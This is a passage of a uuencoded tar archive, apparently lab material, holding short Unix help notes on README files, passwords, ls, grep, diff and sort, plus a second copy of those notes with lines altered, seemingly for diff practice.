M`````````````````````````````````````````````%1H92!)($-H:6YG
M(&]R($)O;VL@;V8@0VAA;F=E<R!I<R!A;B!A;F-I96YT($-H:6YE<V4@;W)A
M8VQE('1H870@:&%S"F)E96X@:6X@=7-E(&9O<B!C96YT=7)I97,@87,@82!S
M;W5R8V4@;V8@=VES9&]M(&%N9"!A9'9I8V4N"@``````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````;&%B+U)%041-10``````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````#`Q,#`V-#0`,#`R,38U,P`P,#`W,#`W`#`P,#`P
M,#$T,#,Q`#`U-#`R,34V,S$Q`#`P,3(T,S<`,```````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````````````!U<W1A<@`P
M,&5V860`````````````````````````````````````8V,S-3DQ````````
M```````````````````````````P,#`P,S4S`#`P,#`V,3<`````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````!/;B!214%$344@+BXN"BTM+2TM+2TM
M+2TM+2T*1FEL97,@8V%L;&5D(&!214%$344G(&%R92!O9G1E;B!F;W5N9"!O
M;B!U;FEX('-Y<W1E;7,@=&\@871T<F%C="!T:&4*871T96YT:6]N(&]F('!E
M;W!L92!A8V-E<W-I;F<@=&AE(&1I<F5C=&]R>2X@(%1H97D@8V]N=&%I;B!I
M;7!O<G1A;G0*:6YF;W)M871I;VX@86)O=70@=&AE('-O9G1W87)E('-T;W)E
M9"!I;B!T:&4@9&ER96-T;W)Y+"!F;W(@97AA;7!L92P*=F5R<VEO;B!I;F9O
M<FUA=&EO;BP@;W!E<F%T:6YG(&UO9&5S+"!A;F0@:6YS=&%L;&%T:6]N(&YO
M=&5S+@H*2&]W979E<BP@8%)%041-12<@:7,@<F%T:&5R(&QI:V4@86YY(&EN
M<W1R=6-T:6]N(&UA;G5A;"!I;B!T:&%T('!E;W!L90IO;FQY('1E;F0@=&\@
M8V]N<W5L="!I="!W:&5N('-O;65T:&EN9R!G;V5S('=R;VYG+B`@069T97(@
M=&AE(&5V96YT(0H*"D]N('!A<W-W;W)D<R`N+BX*+2TM+2TM+2TM+2TM+2TM
M+0I.97<@<&%S<W=O<F1S('-H;W5L9"!B92!A="!L96%S="!F:79E(&-H87)A
M8W1E<G,@;&]N9R!I9B!T:&5Y"F-O;6)I;F4@=7!P97(M8V%S92!A;F0@;&]W
M97(M8V%S92!L971T97)S+"!O<B!A="!L96%S="!S:7@@8VAA<F%C=&5R<PIL
M;VYG(&EF(&EN(&UO;F]C87-E+B`@57-E<G,@=&AA="!P97)S:7-T(&EN(&5N
M=&5R:6YG('-H;W)T97(*<&%S<W=O<F1S(&%R92!C;VUP<F]M:7-I;F<@=&AE
M:7(@;W=N('-E8W5R:71Y+B!4:&4@;G5M8F5R(&]F"G-I9VYI9FEC86YT(&-H
M87)A8W1E<G,@:6X@82!P87-S=V]R9"!I<R!E:6=H="P@86QT:&]U9V@@;&]N
M9V5R"G!A<W-W;W)D<R!W:6QL(&)E(&%C8V5P=&5D+@H*3VYL>2!T:&4@;W=N
M97(@;V8@=&AE(&YA;64@;W(@=&AE('-U<&5R+75S97(@;6%Y(&-H86YG92!A
M('!A<W-W;W)D.PIT:&4@;W=N97(@;75S="!P<F]V92!H92!K;F]W<R!T:&4@
M;VQD('!A<W-W;W)D+B`@5&AE('-U<&5R+75S97(@8V%N"F-H86YG92!A;GD@
M<&%S<W=O<F0@86YD(&ES(&YO="!F;W)C92!T;R!C;VUP;'D@=VET:"!P87-S
M=V]R9"!A9VEN9PIR97%U:7)E;65N=',N"@H*3VX@;',@+BXN"BTM+2TM+2TM
M+0I&;W(@96%C:"!F:6QE;F%M92!W:&EC:"!I<R!A(&1I<F5C=&]R>2P@;',@
M;&ES=',@=&AE(&-O;G1E;G1S(&]F('1H90ID:7)E8W1O<GD[(&9O<B!E86-H
M(&9I;&5N86UE('=H:6-H(&ES(&$@9FEL92P@;',@<F5P96%T<R!I=',@;F%M
M92!A;F0*86YY(&]T:&5R(&EN9F]R;6%T:6]N(')E<75E<W1E9"X@($)Y(&1E
M9F%U;'0L('1H92!O=71P=70@:7,@<V]R=&5D"F%L<&AA8F5T:6-A;&QY+B`@
M5VAE;B!N;R!A<F=U;65N="!I<R!G:79E;BP@=&AE(&-U<G)E;G0@9&ER96-T
M;W)Y(&ES"FQI<W1E9"X@("!7:&5N('-E=F5R86P@87)G=6UE;G1S(&%R92!G
M:79E;BP@=&AE(&%R9W5M96YT<R!A<F4@9FER<W0*<V]R=&5D(&%P<')O<')I
M871E;'DL(&)U="!F:6QE(&%R9W5M96YT<R!A<F4@<')O8V5S<V5D(&)E9F]R
M90ID:7)E8W1O<FEE<R!A;F0@=&AE:7(@8V]N=&5N=',N"@I);B!O<F1E<B!T
M;R!D971E<FUI;F4@;W5T<'5T(&9O<FUA=',@9F]R('1H92`M0RP@+7@L(&%N
M9"`M;2!O<'1I;VYS+`HO=7-R+S5B:6XO;',@=7-E<R!A;B!E;G9I<F]N;65N
M="!V87)I86)L92P@0T],54U.4RP@=&\@9&5T97)M:6YE('1H90IN=6UB97(@
M;V8@8VAA<F%C=&5R('!O<VET:6]N<R!A=F%I;&%B;&4@;VX@;VYE(&]U='!U
M="!L:6YE+B`@268@=&AI<PIV87)I86)L92!I<R!N;W0@<V5T+"!T:&4@=&5R
M;6EN9F\@9&%T86)A<V4@:7,@=7-E9"!T;R!D971E<FUI;F4@=&AE"FYU;6)E
M<B!O9B!C;VQU;6YS+"!B87-E9"!O;B!T:&4@96YV:7)O;FUE;G0@=F%R:6%B
M;&4@5$5232X@($EF('1H:7,*:6YF;W)M871I;VX@8V%N;F]T(&)E(&]B=&%I
M;F5D+"`X,"!C;VQU;6YS(&%R92!A<W-U;65D+B`@2&5R92!I<R!A"FQI;F4@
M=VAI8V@@8V]N=&%I;G,@4D5!1$U%(0H*"D]N(&=R97`@+BXN"BTM+2TM+2TM
M+2TM"D-O;6UA;F1S(&]F('1H92!G<F5P(&9A;6EL>2!S96%R8V@@=&AE(&EN
M<'5T(&9I;&5N86UE<R`H=&AE('-T86YD87)D"FEN<'5T(&1E9F%U;'0I(&9O
M<B!L:6YE<R!M871C:&EN9R!A('!A='1E<FXN("!.;W)M86QL>2P@96%C:"!L
M:6YE(&9O=6YD"FES(&-O<&EE9"!T;R!T:&4@<W1A;F1A<F0@;W5T<'5T+B`@
M9W)E<"!P871T97)N<R!A<F4@;&EM:71E9"!R96=U;&%R"F5X<')E<W-I;VYS
M(&EN('1H92!S='EL92!O9B!E9"@Q*2X@(&5G<F5P('!A='1E<FYS(&%R92!F
M=6QL(')E9W5L87(*97AP<F5S<VEO;G,@:6YC;'5D:6YG(&%L=&5R;F%T:6]N
M+B`@9F=R97`@<&%T=&5R;G,@87)E(&9I>&5D('-T<FEN9W,@+0IN;R!R96=U
M;&%R(&5X<')E<W-I;VX@;65T86-H87)A8W1E<G,@87)E('-U<'!O<G1E9"X*
M"E=H96X@86YY(&]F('1H92!G<F5P('5T:6QI=&EE<R!I<R!A<'!L:65D('1O
M(&UO<F4@=&AA;B!O;F4@:6YP=70@9FEL92P*=&AE(&YA;64@;V8@=&AE(&9I
M;&4@:7,@9&ES<&QA>65D('!R96-E9&EN9R!E86-H(&QI;F4@=VAI8V@@;6%T
M8VAE<R!T:&4*<&%T=&5R;BX@(%1H92!F:6QE;F%M92!I<R!N;W0@9&ES<&QA
M>65D('=H96X@<')O8V5S<VEN9R!A('-I;F=L92!F:6QE+`IS;R!I9B!Y;W4@
M86-T=6%L;'D@=V%N="!T:&4@9FEL96YA;64@=&\@87!P96%R+"!U<V4@+V1E
M=B]N=6QL(&%S(&$*<V5C;VYD(&9I;&4@:6X@=&AE(&QI<W0N"@H*"D]N(&1I
M9F8@+BXN"BTM+2TM+2TM+2TM"F1I9F8@:7,@82!D:69F97)E;G1I86P@9FEL
M92!C;VUP87)A=&]R+B`@5VAE;B!R=6X@;VX@<F5G=6QA<B!F:6QE<RP@86YD
M"G=H96X@8V]M<&%R:6YG('1E>'0@9FEL97,@=&AA="!D:69F97(@9'5R:6YG
M(&1I<F5C=&]R>2!C;VUP87)I<V]N("AS964*=&AE(&YO=&5S(&)E;&]W(&]N
M(&-O;7!A<FEN9R!D:7)E8W1O<FEE<RDL(&1I9F8@=&5L;',@=VAA="!L:6YE
M<R!M=7-T"F)E(&-H86YG960@:6X@=&AE(&9I;&5S('1O(&)R:6YG('1H96T@
M:6YT;R!A9W)E96UE;G0N("`@17AC97!T(&EN(')A<F4*8VER8W5M<W1A;F-E
M<RP@9&EF9B!F:6YD<R!A('-M86QL97-T('-U9F9I8VEE;G0@<V5T(&]F(&1I
M9F9E<BT@96YC97,N"DEF(&YE:71H97(@9FEL96YA;64Q(&YO<B!F:6QE;F%M
M93(@:7,@82!D:7)E8W1O<GDL(&5I=&AE<B!M87D@8F4@9VEV96X*87,@8"TG
M+"!I;B!W:&EC:"!C87-E('1H92!S=&%N9&%R9"!I;G!U="!I<R!U<V5D+B`@
M268@9FEL96YA;64Q(&ES(&$*9&ER96-T;W)Y+"!A(&9I;&4@:6X@=&AA="!D
M:7)E8W1O<GD@=VAO<V4@9FEL96YA;64@:7,@=&AE('-A;64@87,@=&AE"F9I
M;&5N86UE(&]F(&9I;&5N86UE,B!I<R!U<V5D("AA;F0@=FEC92!V97)S82DN
M"@I4:&5S92!L:6YE<R!R97-E;6)L92!E9"@Q*2!C;VUM86YD<R!T;R!C;VYV
M97)T(&9I;&5N86UE,2!I;G1O"F9I;&5N86UE,BX@("!4:&4@;G5M8F5R<R!A
M9G1E<B!T:&4@;&5T=&5R<R!P97)T86EN('1O(&9I;&5N86UE,BX@($EN"F9A
M8W0L(&)Y(&5X8VAA;F=I;F<@82!F;W(@9"!A;F0@<F5A9&EN9R!B86-K=V%R
M9"!O;F4@;6%Y(&%S8V5R=&%I;@IE<75A;&QY(&AO=R!T;R!C;VYV97)T(&9I
M;&5N86UE,B!I;G1O(&9I;&5N86UE,2X@($%S(&EN(&5D*#$I+`II9&5N=&EC
M86P@<&%I<G,L('=H97)E(&XQ(#T@;C(@;W(@;C,@/2!N-"P@87)E(&%B8G)E
M=FEA=&5D(&%S(&$@<VEN9VQE"FYU;6)E<BX*"D9O;&QO=VEN9R!E86-H(&]F
M('1H97-E(&QI;F5S(&-O;64@86QL('1H92!L:6YE<R!T:&%T(&%R92!A9F9E
M8W1E9"!I;@IT:&4@9FER<W0@9FEL92!F;&%G9V5D(&)Y(&`\)RP@=&AE;B!A
M;&P@=&AE(&QI;F5S('1H870@87)E(&%F9F5C=&5D(&EN"G1H92!S96-O;F0@
M9FEL92!F;&%G9V5D(&)Y(&`^)RX*"DEF(&)O=&@@87)G=6UE;G1S(&%R92!D
M:7)E8W1O<FEE<RP@9&EF9B!S;W)T<R!T:&4@8V]N=&5N=',@;V8@=&AE"F1I
M<F5C=&]R:65S(&)Y(&YA;64L(&%N9"!T:&5N(')U;G,@=&AE(')E9W5L87(@
M9FEL92!D:69F('!R;V=R86T@87,*9&5S8W)I8F5D(&%B;W9E(&]N('1E>'0@
M9FEL97,@=VAI8V@@87)E(&1I9F9E<F5N="X@("!":6YA<GD@9FEL97,@=VAI
M8V@*9&EF9F5R+"!C;VUM;VX@<W5B9&ER96-T;W)I97,L(&%N9"!F:6QE<R!W
M:&EC:"!A<'!E87(@:6X@;VYL>2!O;F4*9&ER96-T;W)Y(&%R92!L:7-T960N
M"@H*3VX@<V]R="`N+BX*+2TM+2TM+2TM+2T*5&AE('-O<G0@<')O9W)A;2!S
M;W)T<R!A;F0@8V]L;&%T97,@;&EN97,@8V]N=&%I;F5D(&EN('1H92!N86UE
M9"!F:6QE<RP*86YD('=R:71E<R!T:&4@<F5S=6QT(&]N=&\@=&AE('-T86YD
M87)D(&]U='!U="X@($EF(&YO(&9I;&5N86UE"F%R9W5M96YT(&ES(&=I=F5N
M+"!O<B!I9B!@+2<@87!P96%R<R!A<R!A;B!A<F=U;65N="P@<V]R="!A8V-E
M<'1S(&EN<'5T"F9R;VT@=&AE('-T86YD87)D(&EN<'5T+@H*3W5T<'5T(&QI
M;F5S(&%R92!N;W)M86QL>2!S;W)T960@;VX@82!C:&%R86-T97(M8GDM8VAA
M<F%C=&5R(&)A<VES+`IF<F]M(&QE9G0@=&\@<FEG:'0@=VET:&EN(&$@;&EN
M92X@(%1H92!D969A=6QT(&-O;&QA=&EN9R!S97%U96YC92!I<PIT:&4@05-#
M24D@8VAA<F%C=&5R('-E="X@($QI;F5S(&-A;B!A;'-O(&)E('-O<G1E9"!A
M8V-O<F1I;F<@=&\@=&AE"F-O;G1E;G1S(&]F(&]N92!O<B!M;W)E(&9I96QD
M<R!S<&5C:69I960@8GD@82!S;W)T+69I96QD+`IS<&5C:69I8V%T:6]N+"!U
M<VEN9R!T:&4@*W-W("AS=&%R=&EN9RUW;W)D*2P@+65W("AE;F0M870M=V]R
M9"DL(&%N9`IT:&4@+71C("AS970M5$%"+6-H87)A8W1E<B]W;W)D(&1E;&EM
M:71E<BD@;W!T:6]N<RP@87,@(&1E<V-R:6)E9`IU;F1E<B!/4%1)3TY3(&)E
M;&]W+B`@5VAE;B!N;R!W;W)D(&1E;&EM:71E<B!I<R!S<&5C:69I960L(&]N
M92!O<B!M;W)E"F%D:F%C96YT('=H:71E+7-P86-E(&-H87)A8W1E<G,@*%-0
M04-%(&%N9"!404(I('-I9VYI9GD@=&AE(&5N9"!O9B!T:&4*<')E=FEO=7,@
M=V]R9#L@=&AE(&QI;F5S.@H*66]U(&-A;B!A<'!L>2!A(&-H87)A8W1E<B!O
M9F9S970@=&\@<W<@86YD(&5W('1O(&EN9&EC871E('1H870@82!F:65L9`II
M<R!T;R!S=&%R="!O<B!E;F0@82!G:79E;B!N=6UB97(@;V8@8VAA<F%C=&5R
M<R!W:71H:6X@82!W;W)D+"!U<VEN9PIT:&4@;F]T871I;VXZ(&!W+F,G+B`@
M02!S=&%R=&EN9R!P;W-I=&EO;B!S<&5C:69I960@:6X@=&AE(&9O<FTZ(&`K
M=RYC)PII;F1I8V%T97,@=&AE(&-H87)A8W1E<B!I;B!P;W-I=&EO;B!C("AB
M96=I;FYI;F<@=VET:"`P(&9O<B!T:&4@9FER<W0*8VAA<F%C=&5R*2P@=VET
M:&EN('=O<F0@=R`H,2!A;F0@,2XP(&%R92!E<75I=F%L96YT*2X@($%N(&5N
M9&EN9PIP;W-I=&EO;B!S<&5C:69I960@:6X@=&AE(&9O<FTZ("!@+7<N8R<@
M:6YD:6-A=&5S('1H870@=&AE(&9I96QD(&5N9',*870@=&AE(&-H87)A8W1E
M<B!J=7-T('!R:6]R('1O('!O<VET:6]N(&,@*&)E9VEN;FEN9R!W:71H(#`@
M9F]R('1H90ID96QI;6ET97(@:G5S="!P<FEO<B!T;R!T:&4@9FER<W0@8VAA
M<F%C=&5R*2P@=VET:&EN('=O<F0@=RX@($EF('1H92`M8@IF;&%G(&ES(&EN
M(&5F9F5C="P@8R!I<R!C;W5N=&5D(&9R;VT@=&AE(&9I<G-T(&YO;BUW:&ET
M92US<&%C92!O<@IN;VXM9&5L:6UI=&5R(&-H87)A8W1E<B!I;B!T:&4@9FEE
M;&0L(&]T:&5R=VES92P@9&5L:6UI=&5R(&-H87)A8W1E<G,*87)E(&-O=6YT
M960N"@I4:&4@86UO=6YT(&]F(&UA:6X@;65M;W)Y('5S960@8GD@=&AE('-O
M<G0@:&%S(&$@;&%R9V4@:6UP86-T(&]N(&ET<PIP97)F;W)M86YC92X@(%-O
M<G1I;F<@82!S;6%L;"!F:6QE(&EN(&$@;&%R9V4@86UO=6YT(&]F(&UE;6]R
M>2!I<R!A"G=A<W1E+B`@268@=&AI<R!O<'1I;VX@:7,@;VUI='1E9"P@<V]R
M="!B96=I;G,@=7-I;F<@82!S>7-T96T@9&5F875L=`IM96UO<GD@<VEZ92P@
M86YD(&-O;G1I;G5E<R!T;R!A9&0@<W!A8V4@87,@;F5E9&5D+B`@($EF('1H
M:7,@;W!T:6]N(&ES"F=I=F5N('-O<G0@<W1A<G1S('=I=&@@:VUE;2P@:VEL
M;V)Y=&5S(&]F(&UE;6]R>2P@:68@86QL;W=E9"P@;W(@87,*8VQO<V4@=&\@
M=&AA="!A;6]U;G0@87,@<&]S<VEB;&4N("`@4W5P<&QY:6YG("UY,"!G=6%R
M86YT965S('1H870@<V]R=`IS=&%R=',@=VET:"!A(&UI;FEM=6T@;V8@;65M
M;W)Y+B`@0GD@8V]N=F5N=&EO;BP@+7D@*'=I=&@@;F\@87)G=6UE;G0I"G-T
M87)T<R!W:71H(&UA>&EM=6T@;65M;W)Y+@H*````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````&QA8B]214%$344R````````````````````
M````````````````````````````````````````````````````````````
M```````````````````````````````````````P,3`P-C0T`#`P,C$V-3,`
M,#`P-S`P-P`P,#`P,#`Q-#$T,0`P-C$R,38S,34W-``P,#$R-3,S`#``````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````=7-T87(`,#!E=F%D````````````````````````````````````
M`&-C,S4Y,0``````````````````````````````````,#`P,#,U,P`P,#`P
M-C$W````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````"D]N(%)%041-
M12`N+BX*+2TM+2TM+2TM+2TM+0I&:6QE<R!C86QL960@8%)%041-12<@87)E
M(&]F=&5N(&9O=6YD(&]N('5N:7@@<WES=&5M<R!T;R!A='1R86-T('1H90IA
M='1E;G1I;VX@;V8@<&5O<&QE(&%C8V5S<VEN9R!T:&4@9&ER96-T;W)Y+B`@
M5&AE>2!C;VYT86EN(&EM<&]R=&%N=`II;F9O<FUA=&EO;B!A8F]U="!T:&4@
M<V]F='=A<F4@<W1O<F5D(&EN('1H92!D:7)E8W1O<GDL(&9O<B!E>&%M<&QE
M+`IV97)S:6]N(&EN9F]R;6%T:6]N+"!O<&5R871I;F<@;6]D97,L(&%N9"!I
M;G-T86QL871I;VX@;F]T97,N"@I(;W=E=F5R+"!@4D5!1$U%)R!I<R!R871H
M97(@;&EK92!A;GD@:6YS=')U8W1I;VX@;6%N=6%L(&EN('1H870@<&5O<&QE
M"F]N;'D@=&5N9"!T;R!C;VYS=6QT(&ET('=H96X@<V]M971H:6YG(&=O97,@
M=W)O;F<N("!!9G1E<B!T:&4@979E;G0A"@I/;B!P87-S=V]R9',@+BXN"BTM
M+2TM+2TM+2TM+2TM+2T*3F5W('!A<W-W;W)D<R!S:&]U;&0@8F4@870@;&5A
M<W0@9FEV92!C:&%R86-T97)S(&QO;F<@:68@=&AE>0IC;VUB:6YE('5P<&5R
M+6-A<V4@86YD(&QO=V5R+6-A<V4@;&5T=&5R<RP@;W(@870@;&5A<W0@<VEX
M(&-H87)A8W1E<G,*<&%S<W=O<F1S(&%R92!C;VUP<F]M:7-I;F<@=&AE:7(@
M;W=N('-E8W5R:71Y+B!4:&4@;G5M8F5R(&]F"F-H87)A8W1E<G,@:6X@82!P
M87-S=V]R9"!I<R!E:6=H="P@86QT:&]U9V@@;&]N9V5R"G=I;&P@8F4@86-C
M97!T960N"@IL;VYG(&EF(&EN(&UO;F]C87-E+B`@57-E<G,@=&AA="!P97)S
M:7-T(&EN(&5N=&5R:6YG('-H;W)T97(*<F5Q=6ER96UE;G1S+@H*<F5Q=6ER
M96UE;G1S+@IR97%U:7)E;65N=',N"@IL;VYG(&EF(&EN(&UO;F]C87-E+B`@
M57-E<G,@=&AA="!P97)S:7-T(&EN(&5N=&5R:6YG('-H;W)T97(*3VYL>2!T
M:&4@;W=N97(@86YD(&YO="!A;GEO;F4@96QS92!O9B!T:&4@<V%M92!N86UE
M(&UA>2!C:&%N9V4@82!P87-S=V]R9#L*=&AE(&]W;F5R(&UU<W0@<')O=F4@
M:&4@:VYO=W,@=&AE(&]L9"!P87-S=V]R9"X@(%1H92!S=7!E<BUU<V5R(&-A
M;@IC:&%N9V4@86YY('!A<W-W;W)D(&%N9"!I<R!N;W0@9F]R8V4@=&\@8V]M
M<&QY('=I=&@@<&%S<W=O<F0@86=I;F<*3VX@;',@+BXN"BTM+2TM+2TM+0I&
M;W(@96%C:"!F:6QE;F%M92!W:&EC:"!I<R!A(&1I<F5C=&]R>2P@;',@;&ES
M=',@=&AE(&-O;G1E;G1S(&]F('1H90ID:7)E8W1O<GD[(&9O<B!E86-H(&9I
M;&5N86UE('=H:6-H(&ES(&$@9FEL92P@;',@<F5P96%T<R!I=',@;F%M92!A
M;F0*86YY(&]T:&5R(&EN9F]R;6%T:6]N(')E<75E<W1E9"X@($)Y(&1E8W)E
M92P@=&AE(&]U='!U="!I<R!S;W)T960*86QP:&%B971I8V%L;'DN("!7:&5N
M(&YO(&%R9W5M96YT(&ES(&=I=F5N+"!T:&4@8W5R<F5N="!D:7)E8W1O<GD@
M:7,*;&ES=&5D+B`@(%=H96X@<V5V97)A;"!A<F=U;65N=',@87)E(&=I=F5N
M+"!T:&4@87)G=6UE;G1S(&%R92!F:7)S=`IS;W)T960@87!P<F]P<FEA=&5L
M>2P@8G5T(&9I;&4@87)G=6UE;G1S(&%R92!P<F]C97-S960@8F5F;W)E"F1I
M<F5C=&]R:65S(&%N9"!T:&5I<B!C;VYT96YT<RX*"DEN(&]R9&5R('1O(&1E
M=&5R;6EN92!O=71P=70@9F]R;6%T<R!F;W(@=&AE("U#+"`M>"P@86YD("UM
M(&]P=&EO;G,L"B]U<W(O-6)I;B]L<R!U<V5S(&%N(&5N=FER;VYM96YT('9A
M<FEA8FQE+"!#3TQ534Y3+"!T;R!D971E<FUI;F4@=&AE"FYU;6)E<B!O9B!C
M:&%R86-T97(@<&]S:71I;VYS(&%V86EL86)L92!O;B!O;F4@;W5T<'5T(&QI
M;F4N("!)9B!T:&ES"G9A<FEA8FQE(&ES(&YO="!S970L('1H92!T97)M:6YF
M;R!D871A8F%S92!I<R!U<V5D('1O(&1E=&5R;6EN92!T:&4*;G5M8F5R(&]F
M(&-O;'5M;G,L(&)A<V5D(&]N('1H92!E;G9I<F]N;65N="!V87)I86)L92!4
M15)-+B`@268@=&AI<PII;F9O<FUA=&EO;B!C86YN;W0@8F4@;V)T86EN960L
M(#@P(&-O;'5M;G,@87)E(&%S<W5M960N("!(97)E(&ES(&$*;&EN92!W:&EC
M:"!C;VYT86EN<R!214%$344A"@H*3VX@9W)E<"`N+BX*+2TM+2TM+2TM+2T*
M0V]M;6%N9',@;V8@=&AE(&=R97`@9F%M:6QY('-E87)C:"!T:&4@:6YP=70@
M9FEL96YA;65S("AT:&4@<W1A;F1A<F0*:6YP=70@9&5F875L="D@9F]R(&QI
M;F5S(&UA=&-H:6YG(&$@<&%T=&5R;BX@($YO<FUA;&QY+"!E86-H(&QI;F4@
M9F]U;F0*:7,@8V]P:65D('1O('1H92!S=&%N9&%R9"!O=71P=70N("!G<F5P
M('!A='1E<FYS(&%R92!L:6UI=&5D(')E9W5L87(*97AP<F5S<VEO;G,@:6X@
M=&AE('-T>6QE(&]F(&5D*#$I+B`@96=R97`@<&%T=&5R;G,@87)E(&9U;&P@
M<F5G=6QA<@IE>'!R97-S:6]N<R!I;F-L=61I;F<@86QT97)N871I;VXN("!F
M9W)E<"!P871T97)N<R!A<F4@9FEX960@<W1R:6YG<R`M"FYO(')E9W5L87(@
M97AP<F5S<VEO;B!M971A8VAA<F%C=&5R<R!A<F4@<W5P<&]R=&5D+@H*5VAE
M;B!A;GD@;V8@=&AE(&=R97`@=71I;&ET:65S(&ES(&%P<&QI960@=&\@;6]R
M92!T:&%N(&]N92!I;G!U="!F:6QE+`IT:&4@;F%M92!O9B!T:&4@9FEL92!I
M<R!D:7-P;&%Y960@<')E8V5D:6YG(&5A8V@@;&EN92!W:&EC:"!M871C:&5S
M('1H90IP871T97)N+B`@5&AE(&9I;&5N86UE(&ES(&YO="!D:7-P;&%Y960@
M=VAE;B!P<F]C97-S:6YG(&$@<VEN9VQE(&9I;&4L"G-O(&EF('EO=2!A8W1U
M86QL>2!W86YT('1H92!F:6QE;F%M92!T;R!A<'!E87(L('5S92`O9&5V+VYU
M;&P@87,@80IS96-O;F0@9FEL92!I;B!T:&4@;&ES="X*"@H*3VX@9&EF9B`N
M+BX*+2TM+2TM+2TM+2T*9&EF9B!I<R!A(&1I9F9E<F5N=&EA;"!F:6QE(&-O
M;7!A<F%T;W(N("!7:&5N(')U;B!O;B!R96=U;&%R(&9I;&5S+"!A;F0*=VAE
M;B!C;VUP87)I;F<@=&5X="!F:6QE<R!T:&%T(&1I9F9E<B!D=7)I;F<@9&ER
M96-T;W)Y(&-O;7!A<FES;VX@*'-E90IT:&4@;F]T97,@8F5L;W<@;VX@8V]M
M<&%R:6YG(&1I<F5C=&]R:65S*2P@9&EF9B!T96QL<R!W:&%T(&QI;F5S(&UU
M<W0*8F4@8VAA;F=E9"!I;B!T:&4@9FEL97,@=&\@8G)I;F<@=&AE;2!I;G1O
M(&%G<F5E;65N="X@("!%>&-E<'0@:6X@<F%R90IC:7)C=6US=&%N8V5S+"!D
M:69F(&9I;F1S(&$@<VUA;&QE<W0@<W5F9FEC:65N="!S970@;V8@9&EF9F5R
M+2!E;F-E<RX*268@;F5I=&AE<B!F:6QE;F%M93$@;F]R(&9I;&5N86UE,B!I
M<R!A(&1I<F5C=&]R>2P@96ET:&5R(&UA>2!B92!G:79E;@IA<R!@+2<L(&EN
M('=H:6-H(&-A<V4@=&AE('-T86YD87)D(&EN<'5T(&ES('5S960N("!)9B!F
M:6QE;F%M93$@:7,@80ID:7)E8W1O<GDL(&$@9FEL92!I;B!T:&%T(&1I<F5C
M=&]R>2!W:&]S92!F:6QE;F%M92!I<R!T:&4@<V%M92!A<R!T:&4*9FEL96YA
M;64@;V8@9FEL96YA;64R(&ES('5S960@*&%N9"!V:6-E('9E<G-A*2X*"E1H
M97-E(&QI;F5S(')E<V5M8FQE(&5D*#$I(&-O;6UA;F1S('1O(&-O;G9E<G0@
M9FEL96YA;64Q(&EN=&\*9FEL96YA;64R+B`@(%1H92!N=6UB97)S(&%F=&5R
M('1H92!L971T97)S('!E<G1A:6X@=&\@9FEL96YA;64R+B`@26X*9F%C="P@
M8GD@97AC:&%N9VEN9R!A(&9O<B!D(&%N9"!R96%D:6YG(&)A8VMW87)D(&]N
M92!M87D@87-C97)T86EN"F5Q=6%L;'D@:&]W('1O(&-O;G9E<G0@9FEL96YA
M;64R(&EN=&\@9FEL96YA;64Q+B`@07,@:6X@960H,2DL"FED96YT:6-A;"!P
M86ER<RP@=VAE<F4@;C$@/2!N,B!O<B!N,R`](&XT+"!A<F4@86)B<F5V:6%T
M960@87,@82!S:6YG;&4*;G5M8F5R+@H*1F]L;&]W:6YG(&5A8V@@;V8@=&AE
M<V4@;&EN97,@8V]M92!A;&P@=&AE(&QI;F5S('1H870@87)E(&%F9F5C=&5D
M(&EN"G1H92!F:7)S="!F:6QE(&9L86=G960@8GD@8#PG+"!T:&5N(&%L;"!T
M:&4@;&EN97,@=&AA="!A<F4@869F96-T960@:6X*=&AE('-E8V]N9"!F:6QE
M(&9L86=G960@8GD@8#XG+@H*268@8F]T:"!A<F=U;65N=',@87)E(&1I<F5C
M=&]R:65S+"!D:69F('-O<G1S('1H92!C;VYT96YT<R!O9B!T:&4*9&ER96-T
M;W)I97,@8GD@;F%M92P@86YD('1H96X@<G5N<R!T:&4@<F5G=6QA<B!F:6QE
M(&1I9F8@<')O9W)A;2!A<PID97-C<FEB960@86)O=F4@;VX@=&5X="!F:6QE
M<R!W:&EC:"!A<F4@9&EF9F5R96YT+B`@($)I;F%R>2!F:6QE<R!W:&EC:`ID
M:69F97(L(&-O;6UO;B!S=6)D:7)E8W1O<FEE<RP@86YD(&9I;&5S('=H:6-H
M(&%P<&5A<B!I;B!O;FQY(&]N90ID:7)E8W1O<GD@87)E(&QI<W1E9"X*"@I/
M;B!S;W)T("XN+@HM+2TM+2TM+2TM+0I4:&4@<V]R="!P<F]G<F%M('-O<G1S
M(&%N9"!C;VQL871E<R!L:6YE<R!C;VYT86EN960@:6X@=&AE(&YA;65D(&9I
M;&5S+`IA;F0@=W)I=&5S('1H92!R97-U;'0@;VYT;R!T:&4@<W1A;F1A<F0@
M;W5T<'5T+B`@268@;F\@9FEL96YA;64*87)G=6UE;G0@:7,@9VEV96XL(&]R
M(&EF(&`M)R!A<'!E87)S(&%S(&%N(&%R9W5M96YT+"!S;W)T(&%C8V5P=',@
M:6YP=70*9G)O;2!T:&4@<W1A;F1A<F0@:6YP=70N"@I/=71P=70@;&EN97,@
M87)E(&YO<FUA;&QY('-O<G1E9"!O;B!A(&-H87)A8W1E<BUB>2UC:&%R86-T
M97(@8F%S:7,L"F9R;VT@;&5F="!T;R!R:6=H="!W:71H:6X@82!L:6YE+B`@
M5&AE(&1E9F%U;'0@8V]L;&%T:6YG('-E<75E;F-E(&ES"G1H92!!4T-)22!C
M:&%R86-T97(@<V5T+B`@3&EN97,@8V%N(&%L<V\@8F4@<V]R=&5D(&%C8V]R
M9&EN9R!T;R!T:&4*8V]N=&5N=',@;V8@;VYE(&]R(&UO<F4@9FEE;&1S('-P
